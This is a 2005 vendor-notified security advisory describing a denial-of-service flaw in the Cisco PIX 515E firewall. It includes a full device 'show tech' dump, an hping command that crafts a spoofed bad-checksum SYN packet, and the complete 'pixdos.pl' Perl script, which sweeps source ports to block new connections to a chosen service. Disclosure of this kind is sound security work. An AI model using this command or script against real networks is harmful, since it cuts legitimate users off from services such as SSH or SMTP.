Cisco PIX TCP Connection Prevention
Arhont Ltd.- Information Security
Arhont Advisory by: Konstantin V. Gavrilenko (http://www.arhont.com)
Advisory: Cisco PIX TCP Connection Prevention
Class: design bug
Version: Tested on PIX515E, PIX OS version 6.3(3)
Model Specific: Other versions might have the same bug
DETAILS:
In a situation when a host is located on the trusted side of the network
behind the PIX firewall, there is a possibility to prevent a new
legitimate TCP connection to be established to the host located on the
other side of the firewall. In order to execute such an attack, an
attacker would send a specifically crafted TCP packet with a set
incorrect cheksum through the PIX firewall pretending to be originated
from a legitimate host. S/he would need to specify the source and
destination IP and port, and once such packet is received by the PIX
firewall, there is no possibility to establish a new TCP session with
the credentials specified in the malicious packet. The downtime of the
connection is around 2 minutes 2 seconds, after which the new connection
can be established again and the PIX resumes the normal operation mode.
Such attack does not affect the connections that are already established
through the PIX.
Although, it would take a lot of packets to disrupt the communication
between the hosts completely, we assume that the attacker's aim is to
prevent the communication to a specific service on the remote hosts,
e.g. SSH, SMTP, TCP-syslog, and it takes around 15 seconds to generate
and spit out 65535 packets with a custom source port on a 100mbit lan.
The attack was tested on a PIX firewall 515E with 64Mb of RAM performing
a NAT on the external interface, the configuration file is attached.
The custom packet can be easily generated by hping2 as following:
arhontus / # hping -c 1 -S -s 31337 -k -b -p 22 192.168.xx.xxx
Allowing just one packet through the PIX FW will block the forthcoming
packet from port 31337 to port 22 for a duration of just over 2 minutes.
The sample perl script that is used to automate source port increments
and generate malicious packets is attached.
RISK FACTOR: Medium
WORKAROUNDS: Await Cisco advice on details of the workarounds.
COMMUNICATION HISTORY:
PSIRT notified on 10/10/2005
P release on 22/11/2005
ADDITIONAL INFORMATION:
pixdos.pl tool is attached to this e-mail.
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do
not hesitate to contact Arhont team on info@xxxxxxxxxx
APPENDIX 1. Show Tech output:
pixfw# sh tech
Cisco PIX Firewall Version 6.3(3)
Cisco PIX Device Manager Version 3.0(1)
Compiled on Wed 13-Aug-03 13:55 by morlee
pixfw up 44 days 19 hours
Hardware: PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0x300, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
0: ethernet0: address is 0090.2799.118f, irq 10
1: ethernet1: address is 0090.2799.11b6, irq 11
2: ethernet2: address is 00a4.0080.d29c, irq 11
Licensed Features:
Failover: Disabled
VPN-DES: Enabled
VPN-3DES-AES: Disabled
Maximum Physical Interfaces: 3
Maximum Interfaces: 5
Cut-through Proxy: Enabled
Guards: Enabled
URL-filtering: Enabled
Inside Hosts: Unlimited
Throughput: Unlimited
IKE peers: Unlimited
This PIX has a Restricted (R) license.
Serial Number: 806330010 (0x300f9e9a)
Running Activation Key: 0x50c39a05 0x17a94508 0x39b8204a 0x50691aba
Configuration last modified by enable_15 at 19:04:14.354 UTC Sun Feb 14 1993
------------------ show clock ------------------
19:05:11.235 UTC Sun Feb 14 1993
------------------ show memory ------------------
Free memory: 49178768 bytes
Used memory: 17930096 bytes
------------- ----------------
Total memory: 67108864 bytes
------------------ show conn count ------------------
99 in use, 4993 most used
------------------ show xlate count ------------------
175 in use, 176 most used
------------------ show blocks ------------------
SIZE MAX LOW CNT
4 1600 1588 1599
80 400 397 400
256 1012 912 1011
1550 1189 595 801
------------------ show interface ------------------
interface ethernet0 "outside" is up, line protocol is up
Hardware is i82559 ethernet, address is 0090.2799.118f
IP address *********, subnet mask 255.255.255.0
MTU 1500 bytes, BW 100000 Kbit full duplex
393729057 packets input, 3005934690 bytes, 0 no buffer
Received 56994 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
368741691 packets output, 3096620746 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/22)
output queue (curr/max blocks): hardware (0/100) software (0/1)
interface ethernet1 "inside" is up, line protocol is up
Hardware is i82559 ethernet, address is 0090.2799.11b6
IP address *********, subnet mask 255.255.255.0
MTU 1500 bytes, BW 100000 Kbit full duplex
368500878 packets input, 3132746326 bytes, 0 no buffer
Received 36698 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
393715693 packets output, 2991713049 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/54)
output queue (curr/max blocks): hardware (1/48) software (0/1)
interface ethernet2 "intf2" is administratively down, line protocol is down
Hardware is i82559 ethernet, address is 00a4.0080.d29c
MTU 1500 bytes, BW 10000 Kbit half duplex
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 packets output, 0 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/0) software (0/0)
------------------ show cpu usage ------------------
CPU utilization for 5 seconds = 0%; 1 minute: 3%; 5 minutes: 2%
------------------ show process ------------------
PC SP STATE Runtime SBASE Stack Process
Hsi 001eaa09 008ba2dc 00555860 0 008b9354 3628/4096 arp_timer
Lsi 001effad 0095d4d4 00555860 0 0095c55c 3816/4096 FragDBGC
Lwe 00119abf 009de6c4 00558fc0 0 009dd85c 3688/4096 dbgtrace
Lwe 003e3f55 009e0854 0054e188 21240 009de90c 6184/8192 Logger
Hsi 003e806d 009e394c 00555860 0 009e19d4 8024/8192 tcp_fast
Hsi 003e7f0d 009e59fc 00555860 0 009e3a84 8024/8192 tcp_slow
Lsi 003006f9 00b1bfec 00555860 0 00b1b064 3944/4096 xlate clean
Lsi 00300607 00b1d08c 00555860 0 00b1c114 3884/4096 uxlate clean
Mwe 002f82d3 00cb548c 00555860 0 00cb34f4 7908/8192
tcp_intercept_timer_process
Lsi 0043a545 00d5fd44 00555860 0 00d5edbc 3900/4096 route_process
Hsi 002e80f4 00d60dd4 00555860 0 00d5fe6c 2748/4096 PIX Garbage
Collector
Hwe 00217101 00d6af04 00555860 0 00d66f9c 16048/16384
isakmp_time_keeper
Lsi 002e5e74 00d8528c 00555860 0 00d84304 3944/4096 perfmon
Mwe 0020e719 00daf6bc 00555860 0 00dad744 7860/8192 IPsec timer
handler
Hwe 0039a4db 00dc416c 00570980 0 00dc2224 7000/8192
qos_metric_daemon
Mwe 00261395 00ddeca4 00555860 0 00ddad3c 15592/16384 IP Background
Lwe 002f8f4a 00e915f4 0056bc98 0 00e9077c 3704/4096 pix/trace
Lwe 002f9182 00e926a4 0056c3c8 0 00e9182c 3704/4096 pix/tconsole
Hwe 0011f217 00e9e65c 00502bc0 0 00e9ab94 14732/16384 ci/console
Csi 002f0fd3 00e9fb9c 00555860 0 00e9ec44 3540/4096
update_cpu_usage
Hwe 002dcba1 00f43b34 00534c00 0 00f3fcac 15884/16384 uauth_in
Hwe 003e6b5d 00f45c34 009927a8 0 00f43d5c 7896/8192 uauth_thread
Hwe 003fce0a 00f46d84 0054e788 0 00f45e0c 3960/4096 udp_timer
Hsi 001e2636 00f48a44 00555860 0 00f47acc 3928/4096 557mcfix
Crd 001e25eb 00f49b04 00555cd8 3114406700 00f48b7c 3684/4096 557poll
Lsi 001e26a5 00f4aba4 00555860 0 00f49c2c 3848/4096 557timer
Cwe 001e4229 00f60c7c 0079b338 3039940 00f5ed84 5208/8192 pix/intf0
Mwe 003fcb7a 00f61d8c 009db3d0 0 00f60e54 3896/4096 riprx/0
Msi 003a3999 00f62e9c 00555860 0 00f61f24 3524/4096 riptx/0
Cwe 001e4229 00f69034 00725dc8 3054440 00f6713c 4876/8192 pix/intf1
Mwe 003fcb7a 00f6a144 009db388 0 00f6920c 3896/4096 riprx/1
Msi 003a3999 00f6b254 00555860 0 00f6a2dc 3888/4096 riptx/1
Cwe 001eccfd 00f7145c 00886978 0 00f6f4f4 8040/8192 pix/intf2
Mwe 003fcb7a 00f724fc 009db340 0 00f715c4 3896/4096 riprx/2
Msi 003a3999 00f7360c 00555860 0 00f72694 3888/4096 riptx/2
Mwe 003fcb7a 00fe66a4 009db268 0 00fe477c 7644/8192 radius_rcvauth
Mwe 003fcb7a 00fe7754 009db220 0 00fe682c 3548/4096 radius_rcvacct
Mwe 0039bd42 00fe8854 00547f48 0 00fe78dc 3960/4096 radius_snd
Hwe 003e6df1 00fe8c64 00968f30 0 00fe89bc 284/1024 listen/http1
Hwe 003fcb7a 00fe9814 009db2b0 0 00fe8e6c 2356/4096 snmp
Hwe 003fcb7a 00fea434 009db2f8 0 00fea0ec 840/1024 snmp_ex
Hwe 003e6df1 00feac24 00969028 0 00fea9dc 172/1024 listen/pfm
Hwe 003e6df1 00feb4fc 00969120 0 00feaeb4 1196/2048 listen/telnet_1
Hwe 003e6df1 00febe04 00969218 0 00feb7bc 1196/2048 listen/ssh_1
Mwe 00370852 00fee65c 00555860 600 00fec6e4 5476/8192 Crypto CA
Mwe 003e0b11 00ffab64 00555860 0 00ff8bec 6440/8192 ssh/timer
M* 003d9c8c 0009ff2c 00555898 460 010f4ccc 3992/8192 ssh
------------------ show failover ------------------
No license for Failover
------------------ show traffic ------------------
outside:
received (in 3870403.800 secs):
393818423 packets 3019023411 bytes
0 pkts/sec 1 bytes/sec
transmitted (in 3870403.800 secs):
368984754 packets 3401126889 bytes
1 pkts/sec 0 bytes/sec
inside:
received (in 3870404.160 secs):
368698713 packets 3380524010 bytes
0 pkts/sec 0 bytes/sec
transmitted (in 3870404.160 secs):
393788677 packets 3002331521 bytes
0 pkts/sec 0 bytes/sec
intf2:
received (in 3870404.160 secs):
0 packets 0 bytes
0 pkts/sec 0 bytes/sec
transmitted (in 3870404.160 secs):
0 packets 0 bytes
0 pkts/sec 0 bytes/sec
------------------ show perfmon ------------------
PERFMON STATS: Current Average
Xlates 4/s 0/s
Connections 4/s 0/s
TCP Conns 4/s 0/s
UDP Conns 0/s 0/s
URL Access 0/s 0/s
URL Server Req 0/s 0/s
TCP Fixup 1236/s 0/s
TCPIntercept 0/s 0/s
HTTP Fixup 0/s 0/s
FTP Fixup 0/s 0/s
AAA Authen 0/s 0/s
AAA Author 0/s 0/s
AAA Account 0/s 0/s
------------------ show running-config ------------------
: Saved
:
PIX Version 6.3(3)
interface ethernet0 auto
interface ethernet1 auto
interface ethernet2 auto shutdown
nameif ethernet0 outside security0
nameif ethernet1 inside security100
nameif ethernet2 intf2 security4
enable password ******** encrypted
passwd ********* encrypted
hostname pixfw
domain-name testing.arhont.com
fixup protocol dns maximum-length 512
fixup protocol ftp 21
fixup protocol h323 h225 1720
fixup protocol h323 ras 1718-1719
fixup protocol http 80
fixup protocol rsh 514
fixup protocol rtsp 554
fixup protocol sip 5060
fixup protocol sip udp 5060
fixup protocol skinny 2000
fixup protocol smtp 25
fixup protocol sqlnet 1521
fixup protocol tftp 69
names
access-list acl_inbound permit icmp any any echo-reply
access-list acl_inbound permit icmp any any time-exceeded
access-list acl_inbound permit icmp any any unreachable
<access list entries skipped>
pager lines 24
logging on
logging timestamp
logging buffered warnings
logging trap warnings
logging history warnings
logging device-id hostname
logging host outside *********
mtu outside 1500
mtu inside 1500
mtu intf2 1500
ip address outside ********
ip address inside *******
no ip address intf2
ip audit info action alarm
ip audit attack action alarm
pdm location ********* 255.255.255.0 inside
pdm logging warnings 100
pdm history enable
arp timeout 14400
global (outside) 1
global (outside) 2
global (outside) 3
global (outside) 4
global (outside) 5
nat (inside) 1 access-list forcenat-105 0 0
nat (inside) 2 access-list forcenat-9 0 0
nat (inside) 3 access-list forcenat-1-net 0 0
nat (inside) 4 access-list forcenat-10-net 0 0
nat (inside) 5 access-list forcenat-11-net 0 0
nat (inside) 0 ********* 255.255.255.0 0 0
access-group acl_inbound in interface outside
rip outside default version 2 authentication md5 ******** 1
route outside 0.0.0.0 0.0.0.0 ********* 1
timeout xlate 3:00:00
timeout conn 3:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225
1:00:00
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
aaa-server radius-acctport 1813
aaa-server TACACS+ protocol tacacs+
aaa-server RADIUS protocol radius
aaa-server RADIUS (outside) host ******** ******** timeout 20
aaa-server LOCAL protocol local
http server enable
http ********** 255.255.255.0 inside
snmp-server host inside *********** trap
snmp-server location Yuggoth
snmp-server contact Kthulhu
snmp-server community public
snmp-server enable traps
floodguard enable
crypto ipsec transform-set kosts esp-des esp-sha-hmac
crypto map kosmap 10 ipsec-isakmp
crypto map kosmap 10 match address 110
crypto map kosmap 10 set pfs group2
crypto map kosmap 10 set peer **********
crypto map kosmap 10 set transform-set kosts
crypto map kosmap 10 set security-association lifetime seconds 600
kilobytes 4608000
isakmp key ******** address ********* netmask 255.255.255.255
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption des
isakmp policy 10 hash sha
isakmp policy 10 group 2
isakmp policy 10 lifetime 3600
telnet ********* 255.255.255.0 inside
telnet timeout 60
ssh ********* 255.255.255.0 inside
ssh timeout 30
console timeout 0
terminal width 80
Cryptochecksum:b4a63a116c67521e09fbbbc9fdec895e
: end
--
Respectfully,
Konstantin V. Gavrilenko
Arhont Ltd - Information Security
web: http://www.arhont.com
http://www.wi-foo.com
e-mail: k.gavrilenko@xxxxxxxxxx
tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141
PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com
#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not
installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed
\n" if $@;
eval ("use Term::ProgressBar;");die "[error] Term::ProgressBar perl module is
not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions (
"help" =>\$usage,
"device=s" => \$device,
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);
######################## Config option
#############################################
my $timeout = "0,1"; # Timeout
if ($usage) {&usage;}
if (!$device) {
$device= 'eth0'; # Network device
}
if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}
my $syn="1"; # TCP SYN SET
my $tcpdata = "TEST"; # TCP payload
my $count=0;
####################################################################################
#Initialize Progres Bar
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);
if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else {
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}
for ($count=0; $count< 65537 ; $count++) {
$packet->set({
ip => {
saddr => $sourceip,
daddr => $destip
},
tcp => {
check => 0x0010 , # TCP Packet Checksum 0 for auto correct
source => $count,
dest => $tcpport,
syn => $syn,
data => $tcpdata
}});
$packet->ethsend($timeout);
#$packet->send($timeout);
$progress->update($_);
$count++;
}
sub usage {
print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs
and comments to info@xxxxxxxxxx
usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
[--destmac=MAC] [--port=n]
Options:
--help This message
--device Network interface (defaut set eth0)
--source Victim source IP
--dest Victim destination IP
--sourcemac Victim source MAC
--destmac MAC Address of the gateway
--port TCP port
Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111
\
--sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22
EOF
exit shift;
}